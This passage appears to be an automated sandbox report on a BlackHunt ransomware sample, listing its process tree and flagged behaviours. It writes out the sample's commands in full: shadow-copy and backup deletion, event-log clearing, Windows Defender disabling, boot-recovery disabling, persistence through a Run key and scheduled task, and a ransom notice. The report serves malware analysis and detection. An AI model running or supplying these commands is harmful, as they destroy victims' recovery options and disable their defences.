wrote to memory of 1536 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 100 PID 4312 wrote to memory of 1536 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 100 PID 4576 wrote to memory of 2920 4576 cmd.exe 169 PID 4576 wrote to memory of 2920 4576 cmd.exe 169 PID 3164 wrote to memory of 5016 3164 cmd.exe 170 PID 3164 wrote to memory of 5016 3164 cmd.exe 170 PID 4312 wrote to memory of 3236 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 101 PID 4312 wrote to memory of 3236 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 101 PID 4312 wrote to memory of 644 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 102 PID 4312 wrote to memory of 644 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 102 PID 3852 wrote to memory of 352 3852 cmd.exe 167 PID 3852 wrote to memory of 352 3852 cmd.exe 167 PID 388 wrote to memory of 5036 388 cmd.exe 166 PID 388 wrote to memory of 5036 388 cmd.exe 166 PID 4312 wrote to memory of 1144 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 105 PID 4312 wrote to memory of 1144 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 105 PID 4312 wrote to memory of 2992 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 164 PID 4312 wrote to memory of 2992 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 164 PID 4312 wrote to memory of 1556 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 163 PID 4312 wrote to memory of 1556 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 163 PID 4312 wrote to memory of 1980 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 109 PID 4312 wrote to memory of 1980 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 109 PID 4312 wrote to memory of 456 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 107 PID 4312 wrote to memory of 456 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 107 PID 4312 wrote to memory of 4632 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 113 PID 4312 wrote to memory of 4632 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 113 PID 4672 wrote to memory of 4480 4672 cmd.exe 128 PID 4672 wrote to memory of 4480 4672 cmd.exe 128 PID 4628 wrote to memory of 2388 4628 cmd.exe 112 PID 4628 wrote to memory of 2388 4628 cmd.exe 112 PID 4312 wrote to memory of 1936 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 161 PID 4312 wrote to memory of 1936 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 161 PID 976 wrote to memory of 3188 976 cmd.exe 116 PID 976 wrote to memory of 3188 976 cmd.exe 116 PID 4312 wrote to memory of 1764 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 118 PID 4312 wrote to memory of 1764 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 118 PID 4888 wrote to memory of 4408 4888 cmd.exe 159 PID 4888 wrote to memory of 4408 4888 cmd.exe 159 PID 4312 wrote to memory of 4380 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 119 PID 4312 wrote to memory of 4380 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 119 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe"C:\Users\Admin\AppData\Local\Temp\738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4312 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:4480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:180
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1536
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:9920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:9904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:5768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:10096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:10120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:10104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4380
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4980
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2736
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:9620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3144
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3444
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5332
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5236
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5176
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5144
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3176
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe" /F2⤵PID:2228
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe" /F3⤵
- Creates scheduled task(s)
PID:6592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:10112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:10128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:5040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:12276
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:14084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:10612
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:7040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:12272
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:13908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:8836
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:13680
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:8256
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:9380
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2764
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:9512
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:11452
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:9492
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:19852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:11024
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:18060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:5736
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:13412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:9592
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:13360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:4116
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:8112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:8860 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:13500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13500 -s 14604⤵
- Program crash
PID:13656
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe"2⤵PID:9520
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5124
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:13372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:6484
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:13348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2432
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1088
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:5884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:6536
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1872
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:13620
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:3188
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Adds Run key to start application
PID:4480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:944
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2432
-
